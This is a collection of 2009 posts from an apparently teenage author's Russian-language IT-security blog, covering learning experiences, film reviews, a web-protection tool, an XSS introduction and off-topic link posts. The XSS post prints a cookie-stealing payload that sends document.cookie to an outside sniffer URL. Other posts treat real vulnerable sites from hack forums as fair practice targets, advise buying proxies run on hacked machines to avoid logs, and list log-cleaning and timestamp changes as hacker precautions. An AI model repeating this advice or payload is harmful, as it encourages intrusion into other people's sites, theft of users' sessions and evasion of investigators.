IT Security

Кул карс

2009-12-28T04:08:00.000-08:00

НУ что, юные защитники информации? Мне блин надоело пистаь обо всяких багах, языках программирования, но желание писать осталось! ПисАть, а не пИсать! Вот например пишу про сайт с машинками. Кстати довольно симпотичными. Тут и пикапы, и внедорожники есть. Вообщем смотрим!

Строительство

2009-09-19T05:46:00.000-07:00

Ребят, а вы никогда не сталкивались с такой необходимостью как строительство? Что? Думаете и не встретитесь? Я тоже думал, что каждый должен заниматься своим делом! Я - проверять системы на безопансость, а строители - строить и чинить. Оказывается в этой жизни приходится заниматься не только тем, что тебе положено а ещё целой кучей других обязанностей, например как это. Мне потребовалось починить крышу:) Кстати в этом деле очень помог вот этот сайт

XSS

2009-08-08T02:01:00.001-07:00

В предыдущем посту я упомянул о таких атаках как xss, sql_injection. Настало время вас познакомить с ними поближе и начну я, пожалуй, с xss. Я считаю что необязательно вам забивать голову как это расшифровывается и как переводится. Возможность проведения атаки заключается в том, что в каком-либо месте скрипта или веб-страницы (комментарии в гостевых книгах, сообщения на форумах) не фильтруется тег script , что может привести к выполнению произвольного кода, написанного на Java Script. Обычно с помощью xss крадут куки или ставят переадресацию на другой ресурс (например с целью получения дополнительного трафика). Пример переадресации:

window. location. href = "http://www.softtime.ru"

где http://www.softtime.ru - адрес, куда происходит переадресация.
А вот и пример кражи кукисов:

document. location = 'http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie

где http://www.cgisecurity.com/cgi-bin/cookie.cgi? - адрес сниффера, в котором сохранятся куки.

WEB SECURITY SYSTEM

2009-08-05T06:16:00.000-07:00

программа предназначена для защиты от SQL-инъекций, xss и RFI-атак. Среди плюсов программый: быстрая работа с php файлами;логирование всех атак в БД;быстрое обнаружение уязвимостей и их устранение. Админка системы позволяет: просматривать IP-адреса атакующих; получать информацию о типах атак; просматривать все логи по конкретному IP атакующего.
Кроме конфигурации, которая располагается в файле config.php, рекомендую изучить содержимое скрипта prt_system.php, т.к в нём сосредоточены основные настройки и функции системы.
Так что смело заливай софтину на свой сервер и приступай к конфигурации. Почувствуй себя админом и Помни, безопасности много не бывает.

Практика

2009-08-02T20:15:00.000-07:00

Как вы наверно уже поняли основной проблемой начинающих IT'шников является отсутствие практики, т.к практиковаться на чужих сайтах довольно опасно (это противоречит УК РФ). Сегодня я вам расскажу где же можно попрактиковаться, не нарушая Уголовный Кодекс.
1) Это квесты. Их специально создают, чтобы ломать. На этих квестах очень удобно оттачивать то, что вы прочитали 5 минут назд в какой-нибудь статье. Найти такие квесты можно сдесь.
2) Это слоны, которые размещают на хак-форумах. На каждом таком форуме есть темы, в которые постят ссылки на уязвимые сайты.Несмотря на то, что это реальные сайты, я считаю их тренировочной площадкой, т.к. всё равно за взлом этих сайтов никто тебя искать не будет, потому что в логах останется не только твой IP, но сотни других, желающих попробовать свои силы. Навсякий случай используй проксики.
3) И наконец самое разумный способ-поставить сервер на своём компе! Прикрутить php, поставить mySQL и ставить уязвимые CMS, а потом пытаться их взломать или исправить ошибки в них.

Основы анонимности

2009-07-29T10:01:00.000-07:00

Итак, прежде чем что-то делать в сети, нужно подумать о своей анонимности.
Когда ты заключал договор с твоим провайдером, то указывал ему свой адрес, телефон. Когда ты заходишь в Интернет - провайдер выдаёт тебе некий IP адрес (это что-то типа твоего адреса, только в Интернете). И при любом взломе в логах остаётся твой IP адрес, а дальше милиция обращается к твоему провайдеру и спрашивает адрес того, кто выходил под этим IP адресом. Чтобы этого не случилось нужно использовать прокси серверы. Их запросто можно найти в Интернете, но они тоже ведут логи, а значит, при желании тебя всё ещё можно вычислить. Но и из этого положения есть выход -покупать эти проксики. Обычно те, кто их продаёт, сами их ставят на взломанных машинах. Вот эти прокси логи не ведут. Стоит один примерно 15 центов.
P.S. Если вам непонятна какая-либо терминология в моих постах, то спрашивайте, и я буду публиковать словари.

Сериал "Сеть"

2009-07-25T08:52:00.000-07:00

Купил DVD с сериалом "Сеть". Вот недавно закончил смотреть. Ну что сказать? Хотел бы я иметь такой "скилл" компьютера, как у главных персонажей. Фильм наполнен как всегда фантастическими взломами, 3-D интернетом, и другими вещами, доступными только спец. подразделениям. Но несмотря на всё фильм великолепный, замечательная актёрская игра, сюжет... Вообщем очень советую посмотреть, компьютерщикам - как минимум дважды!

Ошибки хакеров

2009-07-22T03:36:00.000-07:00

Нашёл статью про самые распространённые ошибки хакеров. Сдесь приведу лишь краткое содержание этой статьи, а саму статью найдёте здесь. Итак вот эти ошибки:
1) не уделил внимание чистке логов;
2) не уделил внимание изменению даты на файлах;
3) История команд;
4) Заражение системы руткитами;
5) Установка своего софта на взломанную систему;
6) Сканирование со взломанной системы;
7) Изменение рулесов фаервола;
8) Добавление новых пользователей;
9) Допуск в систему посторонних лиц;
10) Выбор профессии хакера;

Ошибки

2009-07-20T08:38:00.000-07:00

Как и обещал пишу про ошибки, которые я совершал в своё время. Самой главной моей ошибкой было изучение теории без закрепляющей практики. Чтобы не повторить мою ошибку, когда прочитаете про очередную дыру в какой-либо программе, ставьте на свой комп сервер, ставьте эту
программу, проводите атаку, а потом пытайтесь закрыть брешь.
Ещё одной ошибкой стало изучение Delphi. Он мне никак не
помог в изучении безопасности, всё равно пришлось учить php.
И последней ошибкой было изучение способов взлома и защиты
без навыков программирования. Вот вроде и всё. Читайте и не
повторяйте моих ошибок, иначе прогресс вашего обучения
сильно затормозится.

Фильм Сеть

2009-07-20T08:27:00.000-07:00

Только час назад посмотрел по ТНТ фильм "Сеть". Оригинальное название "The Net". Поначалу фильм мне показался нудным, но ближе к середине я уже не мог оторваться от
экрана. Интрига сохраняется до последних минут просмотра. Конечно все взломы в фильме я бы отнёс к жанру фантастики, но в целом эта работа мне очень понравилась. За более подробной информации о фильме сотетую обратиться на сайт www.kinopoisk.ru.
Вот прямая ссылка на страницу о фильме: http://www.kinopoisk.ru/level/1/film/6132/

Знакомство с безопасностью

2009-07-18T18:51:00.000-07:00

Первая встреча именно с безопасностью, а не с играми произошла в больнице. Да-да в больнице. Там лежал один парень и у него был какой-то компьютерный журнал, который я попросил почитать, но никаких игр там не оказалось. Журнал был в основном про железо. Там я и нашёл статьи про то, как узнать пароль от учётной записи в Windows 98. После выписки из больницы я взял телефончик у того парня (на всякий случай, в компах он разбирался явно больше чем я) и поехал домой. Спустя час был совершён мой первый реальный взлом - объектом была учётная запись отца. Данный процесс проникновения мне очень понравился и я стал рыскать в сети в поисках подобной информации. Ограниченный интернетом(а это был диалап) прогресс шёл очень медленно, но всё же шёл и мне это очень нравилось.
В следующем посте я напишу какие ошибки совершают в обучении программисты, хакеры, админы.

Первый пост

2009-07-18T05:05:00.000-07:00

Итак я пишу первый пост. В отличии от других блогов я не буду писать здесь своё имя, возраст. Напишу только, что я перешёл в 11 класс. Зачем я создал этот блог? Он будет отображать процесс достижения моей главной цели: стать хорошим IT специалистом и зарабатывать на этом вполне легально. Началось всё год назад. Когда мне купили компьютер, я ,как и все нормальные подростки, стал играть в компьютерные игры целыми сутками, но играть по правилам мне очень быстро надоело. Я стал искать способы обмануть игру, врезультате чего познакомился с такой программой как ArtMoney и с такими понятиями как Тренер для игр и модификация. Чуть позже меня стал интересовать процесс как самому создавать моды, которые бы мне облегчали прохождение очередной игрушки. Информацию об этом я стал черпать из журналов Игромании,
а конкретно раздел Вскрытие. Вот так я начал знакомится с различными
графическими расширениями, граф. редакторами, упаковщиками и т.д.